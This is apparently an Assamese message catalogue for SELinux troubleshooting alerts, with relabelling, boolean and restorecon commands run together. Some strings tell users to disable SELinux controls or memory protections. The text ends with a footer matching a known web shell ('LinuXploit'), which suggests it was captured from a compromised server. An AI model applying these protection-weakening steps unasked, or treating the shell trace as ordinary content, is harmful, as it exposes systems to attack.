    ৱেব পৃষ্ঠায় কেনেদৰে এই প্ৰয়োজনীয়তা আতৰোৱা হব তাৰ বিৱৰণ দিয়ে।  যদি $SOURCE কাৰ্য্য নকৰে আৰু
    আপুনি ইয়াক কাৰ্য্যত কৰিব বিচাৰে, আপুনি SELinux ক অস্থায়ীভাৱে এই অভিগমৰ অনুমতি দিবলে সংৰূপণ কৰিব
    পাৰে যেতিয়ালৈকে এপ্লিকেচন ঠিক হৈ নাযায়। অনুগ্ৰহ কৰি এই পেকেইজৰ বিপৰিতে
    এটা বাগ সংবাদ জমা দিয়ক।
    
    SELinux পৰিপ্ৰেক্ষতিতৰ বাহিৰে সকলো অনুমতি সংৰক্ষণ কৰিবলে "cp -p" ৰ নিচিনা এটা কমান্ড ব্যৱহাৰ কৰক।
    
    আপুনি chcon -R -t rsync_data_t '$TARGET_PATH' এক্সিকিউট কৰি ফাইল পৰিপ্ৰেক্ষতিত সলনি কৰিব পাৰিব
    আপুনি লগতে চিস্টেমত অবিকল্পিত ফাইল পৰিপ্ৰেক্ষতিত ফাইলসমূহ সলনি কৰিব লাগিব সিহতক এটা সম্পূৰ্ণ পুনৰলেবেলত সংৰক্ষণ কৰিবলে। "semanage fcontext -a -t rsync_data_t '$FIX_TARGET_PATH'"
    
    আপুনি chcon -R -t samba_share_t '$TARGET_PATH' এক্সিকিউট কৰি ফাইল পৰিপ্ৰেক্ষতিত সলনি কৰিব পাৰিব
    আপুনি লগতে চিস্টেমত অবিকল্পিত ফাইল পৰিপ্ৰেক্ষতিত ফাইলসমূহ সলনি কৰিব লাগিব যাতে সিহতক এটা সম্পূৰ্ণ পুনৰলেবেলত সংৰক্ষৰণ কৰিব পাৰি।  "semanage fcontext -a -t samba_share_t '$FIX_TARGET_PATH'"
    
    আপুনি ফাইল পৰিপ্ৰেক্ষতিতক chcon -t public_content_t '$TARGET_PATH' এক্সিকিউট কৰি সলনি কৰিব পাৰিব
    আপুনি লগতে চিস্টেমৰ অবিকল্পিত ফাইল পৰিপ্ৰেক্ষতিত ফাইলসমূহ সলনি কৰিব লাগিব যাতে সিহতক এটা সম্পূৰ্ণ পুনৰলেবেলত সংৰক্ষণ কৰিব পাৰি।  "semanage fcontext -a -t public_content_t '$FIX_TARGET_PATH'"
    
    আপুনি chcon -t swapfile_t '$TARGET_PATH' এক্সিকিউট কৰি ফাইল পৰিপ্ৰেক্ষতিত সলনি কৰিব পাৰিব
    আপুনি লগতে চিস্টেমত অবিকল্পিত ফাইল পৰিপ্ৰেক্ষতিত ফাইলসমূহ সলনি কৰিব লাগিব যাতে সিহতক এটা সম্পূৰ্ণ পুনৰলেবেলত সংৰক্ষণ কৰিব পাৰি।  "semanage fcontext -a -t swapfile_t '$FIX_TARGET_PATH'"
    
    আপুনি ফাইল পৰিপ্ৰেক্ষতিতক chcon -t virt_image_t '$TARGET_PATH' এক্সিকিউট কৰি সলনি কৰিব পাৰিব
    আপুনি লগতে চিস্টেমত অবিকল্পিত ফাইল পৰিপ্ৰেক্ষতিত ফাইলসমূহ সলনি কৰিব লাগিব যাতে সিহতক এটা সম্পূৰ্ণ পুনৰ লেবেলত সংৰক্ষণ কৰিব পাৰি।  "semanage fcontext -a -t virt_image_t '$FIX_TARGET_PATH'"
    
    আপুনি chcon -t xen_image_t '$TARGET_PATH' এক্সিকিউট কৰি ফাইল পৰিপ্ৰেক্ষতিত সলনি কৰিব পাৰিব
    আপুনি লগতে চিস্টেমৰ অবিকল্পিত ফাইল পৰিপ্ৰেক্ষতিত ফাইলসমূহ সলনি কৰিব লাগিব যাতে সিহতক এটা সম্পূৰ্ণ পুনৰলেবেলত সংৰক্ষণ কৰিব পাৰি।  "semanage fcontext -a -t xen_image_t '$FIX_TARGET_PATH'"
    
    আপুনি আপোনাৰ কমপিউটাৰ চিস্টেম পুনৰ লেবেল কৰিবলে
    নিম্নলিখিত কমান্ডক ৰুট হিচাপে প্ৰেৰণ কৰিব পাৰে: "touch /.autorelabel; reboot"
    
    আপুনি এই অভিগমৰ অনুমতি দিবলে এটা স্থানীয় নীতি মডিউল সৃজন কৰিব পাৰে
    - <a href="http://docs.fedoraproject.org/selinux-faq-fc5/#id2961385">FAQ</a> চাওক

    অনুগ্ৰহ কৰি এটা বাগ সংবাদ জমা দিয়ক।
    
    আপুনি এই অভিগমৰ অনুমতি দিবলে এটা স্থানীয় নীতি মডিউল সৃজন কৰিব পাৰে
    - <a href="http://docs.fedoraproject.org/selinux-faq-fc5/#id2961385">FAQ</a> চাওক
    
    আপুনি এই ফাইললৈ অবিকল্পিত চিস্টেম পৰিপ্ৰেক্ষতিত পুনৰুদ্ধাৰ কৰিব পাৰিব
   
    restorecon কমান্ড এক্সিকিউট কৰি।  restorecon '$SOURCE_PATH'.
    
    আপুনি restorecon কমান্ড এক্সিকিউট কৰি অবিকল্পিত চিস্টেম পৰিপ্ৰেক্ষতিতক এই ফাইললে পুনৰউদ্ধাৰ
    কৰিব পাৰিব। restorecon '$TARGET_PATH', যদি এই ফাইল এটা ডাইৰেকটৰি হয়,
    আপুনি restorecon -R '$TARGET_PATH' ব্যৱহাৰ কৰি বাৰংবাৰ পুনৰউদ্ধাৰ কৰিব পাৰিব।
    
    আপোনাৰ চিস্টেমত গুৰুতৰভাৱে সাল সলনি হব পাৰে!
    
    আপোনাৰ চিস্টেম গুৰুতৰভাৱে সাল সলনি হব পাৰে! $SOURCE_PATH এ নিম্ন কাৰনেল মেমৰি mmap কৰাৰ চেষ্টা কৰিছিল।
    
    আপোনাৰ চিস্টেমত গুৰতৰভাৱে সাল সলনি হব পাৰে! $SOURCE_PATH এ এটা কাৰনেল মডিউল ল'ড কৰাৰ চেষ্টা কৰিছিল।
    
    আপোনাৰ চিস্টেমত গুৰুতৰভাৱে সাল সলনি হব পাৰে! $SOURCE_PATH এ SELinux বলৱৎকৰণ সলনি কৰাৰ চেষ্টা কৰিছিল।
    
    আপোনাৰ চিস্টেমত গুৰুতৰভাৱে সাল সালনি হব পাৰে! $SOURCE_PATH এ কাৰনেল সংৰূপ সলনি কৰাৰ চেষ্টা কৰিছিল।
    
IPV6 সঠিকভাৱে অসামৰ্থবান কৰক।
    
হয় mozplluger পেকেইজক 'yum remove mozplugger' এক্সিকিউট কৰি আতৰাওক
অথবা Firefox প্লাগিনসমূহত SELinux enforcement বন্ধ কৰক।
setsebool -P unconfined_mozilla_plugin_transition 0
    
যদি আপুনি প্ৰগ্ৰামক প্ৰশ্নত চলাবলে নিৰ্ধাৰন কৰিছে আপোনাৰ এই কাৰ্য্যক অনুমতি
দিয়াৰ প্ৰয়োজন হব ইয়াক কমান্ড শাৰীত কৰিব পৰা যাব
এক্সিকিউট কৰি:

# setsebool -P mmap_low_allowed 1

আপুনি এটা %s ত এটা ধৰণ স্থাপন কৰিব চেষ্টা কৰিছে যি এটা ফাইল ধৰণ নহয়।  ইয়াৰ অনুমতি নাই, আপুনি এটা ফাইল ধৰণ ধাৰ্য্য কৰিব লাগিব।  আপুনি seinfo কমান্ড ব্যৱহাৰ কৰি সকলো ফাইল ধৰণ তালিকাভুক্ত কৰিব পাৰিব।

seinfo -afile_type -x

     "$BOOLEAN" আৰু
    "$WRITE_BOOLEAN" বুলিয়ানসমূহক true লে সলনি কৰিলে অভিগম পোৱা যাব:
    "setsebool -P $BOOLEAN=1 $WRITE_BOOLEAN=1".
    সতৰ্কবাৰ্তা: "$WRITE_BOOLEAN" বুলিয়ানক true লে সংহতি কৰিলে
    ftp ডিমনক সকলো ৰাজহুৱা সমললে (ধৰণ public_content_t ৰ সৈতে
    ফাইলসমূহ আৰু ডাইৰেকটৰিসমূহ ) লিখাৰ অনুমতি দিয়া হব CIFS ফাইলচিস্টেমসমূহত
    ফাইলসমূহ আৰু ডাইৰেকটৰিসমূহলে লিখাৰ অতিৰিক্তে।  # semanage fcontext -a -t SIMILAR_TYPE '$FIX_TARGET_PATH'
# restorecon -v '$FIX_TARGET_PATH'# semanage fcontext -a -t samba_share_t '$FIX_TARGET_PATH%s'
# restorecon %s -v '$FIX_TARGET_PATH'# semanage fcontext -a -t virt_image_t '$FIX_TARGET_PATH'
# restorecon -v '$FIX_TARGET_PATH'# semanage port -a -t %s -p %s $PORT_NUMBER# semanage port -a -t PORT_TYPE -p %s $PORT_NUMBER
    যত PORT_TYPE নিম্নলিখিতৰ এটা: %s।এটা প্ৰক্ৰিয়ায় হয়তো আপোনাৰ চিস্টেম হেক কৰাৰ চেষ্টা কৰি আছে।net.ipv6.conf.all.disable_ipv6 = 1 ক
/etc/sysctl.conf লে
যোগ কৰক
আপোনাৰ সুৰক্ষা প্ৰশাসকৰ সৈতে যোগাযোগ কৰক আৰু এই বিষয়ে সূচীত কৰক।পুনৰুদ্ধাৰ
পৰিপ্ৰেক্ষতিতপৰিপ্ৰেক্ষতিত পুনৰুদ্ধাৰ কৰকSELinux এ $SOURCE_PATH "$ACCESS" অভিগম প্ৰতিৰোধ কৰি আছে।মেমৰি সুৰক্ষা বন্ধ কৰকঅধিক বিৱৰণৰ বাবে আপুনি '%s' man পৃষ্ঠা পঢ়িব পাৰে।আপোনাক হয়তো হেক কৰা হৈছে।আপুনি '%s' বুলিয়ান সামৰ্থবান কৰি SELinux ক ইয়াৰ বিষয়ে কব লাগিব। 
আপুনি $FIX_TARGET_PATH ত লেবেল সলনি কৰিব লাগিবআপুনি $TARGET_BASE_PATH ৰ লেবেল সলনি কৰিব লাগিবআপুনি $TARGET_BASE_PATH to public_content_t অথবা public_content_rw_t ত লেবেল সলনি কৰিব লাগিব।আপুনি লেবেলক $TARGET_BASE_PATH' ত সলনি কৰিব লাগিবআপুনি $TARGET_PATH ৰ লেবেলক এটা সদৃশ যন্ত্ৰৰ ধৰণলে সলনি কৰিব লাগিব।আপুনি '$FIX_TARGET_PATH' ত লেবেল সলনি কৰিব লাগিব'আপুনি ইয়াক এটা বাগ হিচাপে সংবাদ দিব লাগিব।
আপুনি এই অভিগমৰ অনুমতি দিবলে এটা স্থানীয় নীতি মডিউল সৃজন কৰিব পাৰে।আপুনি ইয়াক এটা বাগ হিচাপে সংবাদ দিব লাগিব।
আপুনি এই অভিগম বিশ্লেষণৰ অনুমতি নিদিবলে এটা স্থানীয় নীতি মডিউল সৃজন কৰিব পাৰে।execstack -c %sযদি আপুনি ভাৱে আপোনাক হেক কৰা হৈছেsetsebool -P %s %sনিয়ম নমনা ফাইলৰ পথ তথ্য প্ৰাপ্ত কৰিবলে আৰু ত্ৰুটিক আকৌ সৃজন কৰিবলে সম্পূৰ্ণ সম্পাদন আৰম্ভ কৰক।SELinux পৰিপ্ৰেক্ষতিতৰ বাহিৰে সকলো অনুমতি সংৰক্ষণ কৰিবলে "cp -p" ৰ নিচিনা এটা কমান্ড ব্যৱহাৰ কৰক।আপুনি restorecon চলাব পাৰিব।আপুনি এজন হেকাৰ দ্বাৰা আক্ৰমণৰ সন্মুখিন হব পাৰে, যিহেতু গোপণ এপ্লিকেচনসমূহৰ এই অভিগমৰ কেতিয়াও প্ৰয়োজন নহয়।আপুনি এজন হেকাৰ দ্বাৰা আক্ৰমণৰ সন্মুখিন হব পাৰে, যিহেতু গোপণ এপ্লিকেচনসমূহৰ এই অভিগমৰ প্ৰয়োজন নহয়।আপুনি এজন হেকাৰ দ্বাৰা আক্ৰমণৰ সন্মুখিন হব পাৰে, ই এটা অতি বিপদজনক অভিগম।আপুনি $TARGET_PATH ত লেবেলিং সলনি কৰিব লাগিব।আপুনি লেবেলসমূহ ঠিক কৰিব লাগিব।আপুনি cert ফাইলক ~/.cert ডাইৰেকটৰিলে স্থানান্তৰ কৰিব লাগিবআপুনি এটা বৈধ ফাইল লেবেল বাছিব লাগিব।আপুনি mozplugger পেকেইজ আতৰাব লাগিব।ইয়াৰ অনুমতি দিবলে আপুনি SELinux সংস্থাপন কৰিব লাগিবআপুনি SELinux ক ইয়াৰ বিষয়ে সূচীত কৰিব লাগেআপুনি SELinux ৰ ইয়াৰ বিষয়ে  'httpd_unified' আৰু 'http_enable_cgi' বুলিয়ানসমূহ সামৰ্থবান কৰি কব লাগিবআপুনি vbetool_mmap_zero_ignore বুলিয়ান সামৰ্থবান কৰি SELinux ক ইয়াৰ বিষয়ে কব লাগিব।আপুনি SELinux ক ইয়াৰ বিষয়ে wine_mmap_zero_ignore বুলিয়ান সামৰ্থবান কৰি কব লাগিব।আপুনি Chrome প্লাগিনসমূহত SELinux নিয়ন্ত্ৰণসমূহ বন্ধ কৰিব লাগিব।আপুনি Firefox প্লাগিনসমূহত SELinux নিয়ন্ত্ৰনসমূহ বন্ধ কৰিব লাগিব।আপুনি ইয়াত লেবেলসমূহ যোগ কৰিব লাগিব।আপুনি $TARGET_PATH ত লেবেলক public_content_rw_t লে সলনি কৰিব, আৰু বিভৱীয়ভাৱে allow_httpd_sys_script_anon_write বুলিয়ান অন কৰিব লাগিব।আপুনি সম্পূৰ্ণভাৱে পুনৰ লেবেল কৰিব লাগিব।আপুনি এটা বাগ জমা দিব লাগিব। 
ই বিভৱীয়ভাৱে বিপদজনক অভিগম।আপুনি এটা বাগ জমা দিব লাগিব। ই বিভৱীয়ভাৱে বিপদজনক অভিগম।আপুনি /proc/sys/net/ipv6/conf/all/disable_ipv6 to ক 1 লে সংহতি কৰিব লাগিব আৰু মডিউলক ব্লেকলিস্ট কৰিব লাগিবআপুনি এটা বেলেগ কমান্ড ব্যৱহাৰ কৰিব লাগিব। আপোনাক লক্ষ্য ফাইলচিস্টেমত SELinux পৰিপ্ৰেক্ষতিত সংৰক্ষণ কৰাৰ অনুমতি নাই।আপুনি execstack ফ্লেগ পৰিষ্কাৰ কৰি চাব লাগে যদি $SOURCE_PATH সঠিকভাৱে কাৰ্য্য কৰে।
ইয়াক %s ত এটা বাগ হিচাপে সংবাদ কৰক।
আপুনি exestack ফ্লেগক পৰিষ্কাৰ কৰিব পাৰিব প্ৰেৰণ কৰি:

Youez - 2016 - github.com/yon3zu
LinuXploit